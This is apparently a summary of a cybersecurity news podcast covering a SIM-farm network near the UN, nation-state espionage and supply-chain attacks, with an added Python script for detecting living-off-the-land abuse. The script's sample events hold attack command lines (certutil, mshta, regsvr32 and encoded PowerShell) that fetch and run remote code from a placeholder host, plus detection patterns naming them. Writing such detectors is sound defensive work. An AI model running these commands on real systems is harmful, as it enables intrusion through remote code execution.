CyberWire Daily: Espionage in the Airwaves
Podcast Date: September 23, 2025
Host: Dave Buettner (N2K Networks)
Episode Overview
This episode centers on a sweeping array of current cybersecurity news, with a sharp focus on state-sponsored and criminal espionage activities exploiting telecommunications networks (“espionage in the airwaves”), and supply chain attacks impacting both industries and consumers. The episode features expert commentary—including an in-depth interview with Kim Jones, host of the CISO Perspectives podcast—on trends, threats, and strategies being employed in the evolving threat landscape.
Key Stories & Insights
1. Clandestine Communications Network Dismantled
[00:40 – 04:50]
- What Happened:
The US Secret Service dismantled a covert communications network in the New York region, uncovered as world leaders gathered for the UN General Assembly.
- Operation Details:
- Over 100,000 SIM cards and 300 servers seized within 35 miles of UN HQ.
- Capabilities: Sending 30 million texts per minute, anonymous encrypted comms, and potentially disabling New York’s cellular network.
- Alleged operation tied to at least one foreign nation and known criminals (including cartel members).
- No direct evidence it aimed at disrupting the UN event, but timing and proximity raised concerns of state-backed espionage.
- Ongoing Risk:
- Multiple agencies on the case, warning of similar systems possibly elsewhere.
- Notable Quote:
“These devices allowed anonymous encrypted communications between potential threat actors and criminal enterprises enabling criminal organizations to operate undetected... This network had the potential to disable cell phone towers and essentially shut down the cellular network in New York City.”
—Matt McCool (Special Agent in Charge, Secret Service NY Field Office) [03:39]
- Memorable Moment:
The described ability to send 30 million texts per minute and disrupt emergency services underscores unprecedented sophistication and scale—signaling the convergence between nation-state and criminal interests.
2. Jaguar Land Rover Cyberattack Fallout
[04:50 – 06:01]
- Prolonged plant shutdown (extended until Oct 1); operational losses estimated at $2.9 billion revenue and $202 million profit.
- Company working with UK’s NCSC and law enforcement—focus on secure restart.
- Lack of adequate cyber insurance deepens risks.
- Impact: Layoffs in the supply chain, threats to local businesses, and concerns about a major crisis if no government support materializes.
3. EU Tech Giants Probe: Fighting Online Fraud
[06:01 – 07:20]
- EU issues formal information requests to Apple, Google, Microsoft, and Booking under the Digital Services Act.
- Scrutiny on fraudulent apps, manipulated searches, and fake listings.
- Fines could reach 6% of global revenue for noncompliance.
4. Espionage Campaigns by Nation-State Actors
Iranian APT “Nimbus Manticore” Steps Up Attacks
[07:20 – 08:40]
- Targets: European defense, telecom, aviation sectors (notably Denmark, Sweden, Portugal).
- Tactics:
- Spear phishing via fake recruiter profiles, custom credential tracking.
- DLL sideloading, tools like Mini Junk Backdoor and minibrowse Stealer.
- Advanced code signing, obfuscation, and infrastructure resilience.
- Analyst Take: Reflects a “mature, well-resourced adversary aligned with Iran’s strategic priorities.”
North Korean “Kimsuky” Shortcut-based Espionage
[08:41 – 10:17]
- How It Works:
- Archive files disguised as official docs lure victims into running shortcut files, executing a hidden payload.
- Harvests: Browser data, crypto wallets, Telegram sessions, keystrokes, certificates.
- Technical Traits: Advanced obfuscation, persistence, evasion of VMs, reflective DLL injection.
- Big Picture: Indicates highly covert intelligence collection and credential theft campaign.
5. Software Supply Chain Attacks & Defenses
[10:17 – 13:21]
GitHub Security Upgrades
- Two-factor authentication for local publishing, stricter token policies, deprecation of old methods.
- Impetus: Large-scale attacks (s1ngularity, GhostAction, Shai-Hulud) compromised thousands of accounts.
- Moving toward stronger platform safeguards and more “active developer participation.”
Ruby Central Tightens Controls
- Responding to malicious gem campaigns: Limiting admin access during transition to a transparent, community-driven model.
Malicious Packages in the Wild
- FezBox NPM Package: Used QR codes hiding obfuscated malware, stealing browser cookies and credentials (at least 327 downloads).
- Encrypted payloads and anti-detection techniques illustrate advanced supply chain risk.
LastPass macOS “Clickfix” Campaign
- Fake GitHub repos impersonating over 100 popular apps (e.g., 1Password, Dropbox) push “atomic stealer” malware.
- SEO and automated repo creation make defense difficult.
- Advice: Download only from official vendors.
6. Evolving Tactics of State-Backed Hackers
[13:22 – 15:10]
- AT&T CISO Warning:
- Hackers mimic China’s Salt Typhoon group:
- Targeting systems outside classic EDR coverage,
- Exploiting platforms with limited logging,
- Living-off-the-land with legitimate admin tools for stealth and persistence.
- Stronger cyber defenses are forcing adversaries to chain exploits and innovate.
- NSA’s Rob Joyce:
- Chained exploits and new stealth measures are the response to defensive improvements.
- Key Quote:
“Defenders must adapt, expanding protections beyond conventional endpoints and anticipating how attackers may turn everyday tools into attack vectors.”
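The warning above is about activity that hides in legitimate admin tooling on hosts with thin telemetry. As an added illustration (not from the episode, AT&T or the NSA), the script below runs a few living-off-the-land heuristics over a handful of constructed process-creation events. The event field names (`parent`, `image`, `cmdline`) are my own, not any product's schema, and the sample command lines are made up; the patterns themselves are the kind of widely published defender rules that catch a signed system binary being used as a downloader or script launcher, while leaving ordinary uses of the same binary alone.

```python
import re

# Constructed sample process-creation events (hypothetical field names,
# not a real product schema; none of this is from the podcast).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"parent": "winword.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -hashfile setup.msi SHA256"},   # benign admin use
    {"parent": "svchost.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/x.hta"},
    {"parent": "cmd.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/f.sct scrobj.dll"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA..."},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},  # scheduled job
]

# Command-line heuristics: a legitimate binary used in a way admins rarely need.
LOLBIN_RULES = [
    ("certutil used as a downloader",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("mshta launching a remote script",
     re.compile(r"\bmshta(\.exe)?\b\s+https?://", re.I)),
    ("regsvr32 loading a remote scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://", re.I)),
    ("powershell hidden window with encoded command",
     re.compile(r"\bpowershell(\.exe)?\b(?=.*-w(indowstyle)?\s+hidden)"
                r"(?=.*\s-e(nc|ncodedcommand)?\s)", re.I)),
]

# Parent/child heuristic: office documents should not spawn script hosts.
SCRIPT_HOSTS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                "powershell.exe", "wscript.exe", "cscript.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def evaluate(event):
    """Return the list of rule names the event triggers (empty if none)."""
    reasons = [name for name, pattern in LOLBIN_RULES
               if pattern.search(event["cmdline"])]
    if (event["parent"].lower() in OFFICE_PARENTS
            and event["image"].lower() in SCRIPT_HOSTS):
        reasons.append("office application spawned a script host or LOLBin")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that triggers at least one rule."""
    hits = []
    for i, event in enumerate(events):
        reasons = evaluate(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmdline']}")
        for r in reasons:
            print(f"    -> {r}")
```

The benign `certutil -hashfile` and the scheduled `powershell -File` events pass untouched, which is the point: alerting on the binary alone drowns analysts, so the rules key on the argument shapes and parent-child pairings that separate abuse from routine administration.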
Interview Segment: CISO Perspectives Podcast with Kim Jones
[15:53 – 22:29]
Season Preview and Strategic Themes
- Mindset Shift:
Kim Jones advocates for cyber leaders to “take a half step back”—away from constant firefighting—to reflect and strategize about the exponentially changing risk landscape.
- Season Tagline:
“If I were to put a tagline on it, I wanted to look at Brave New World—with apologies to either Huxley or Shakespeare...”
—Kim Jones [16:16]
- Primary Forces Shaping the Landscape:
- Pandemic & Hybrid Work: Security and compliance models have struggled to keep pace with remote and hybrid arrangements.
- AI Evolution: From generative AI to “agentic AI” changing data analytics and raising privacy risks.
- Regulatory Shifts: Data use and privacy now scrutinized by regulators, with risk of creating new dangers for individuals.
- Quantum Computing: The “next wave” that could disrupt encryption.
- Fraud, Scams & Identity Threats: Deepfakes, vishing, and credential theft rise with increased sophistication.
- Online Identity: The fragility of verifying identity in a world of deepfakes and voice phishing.
- Learning Focus:
This season, Jones emphasizes less self-opinion and more genuine inquiry—“mutual learning” with deep experts, fostering audience understanding as he learns himself.
“These are areas where I'm actually trying to learn and get answers to those questions myself. So I've brought in deep experts in these areas to teach me as well as the audience...”
—Kim Jones [19:44]
- Audience Proxy:
“Yes, absolutely. That's why there's going to be less of Kim talking and... more of a hey, this is why this is probably something you ought to look at very briefly. Then I'm sitting there asking the questions that I would presume, if not hope, that my audience members would be asking...”
—Kim Jones [21:17]
- First Guest & Episode:
Ben Yellen launches season one, discussing “the shifting relationship of regulation and private sector for cyber under this new world order.” [21:54]
Notable Quotes & Moments
- Espionage Scale:
“This network had the potential to disable cell phone towers and essentially shut down the cellular network in New York City.”
—Matt McCool, Secret Service [03:39]
- Leadership Reflection:
“We all understand that change is the only constant out there and we've seen massive amounts of changes just in my 35 years doing this, but just in the past five years...”
—Kim Jones [16:22]
- Learning Approach:
“These are areas where I'm actually trying to learn and get answers to those questions myself. So I've brought in deep experts in these areas to teach me as well as the audience...”
—Kim Jones [19:44]
Other Brief Highlights
- California Lawyer Fined $10,000 for AI “Hallucinations”
- Attorney Amir Mostafavi cited 21 out of 23 cases incorrectly in a court filing, relying on AI-generated content without fact-checking.
- Judge issued a stern warning: “...delegating due diligence to a chatbot is not a winning defense.” [24:20]
Closing Thoughts
This episode underscores the persistently high stakes of modern cyber conflict, including espionage at the infrastructure level, the delicate and dynamic interplay between regulators and technology giants, and the rapidly evolving tactics of advanced threat groups. The preview of CISO Perspectives signals a season focused on learning and preparedness in a period of historic change.
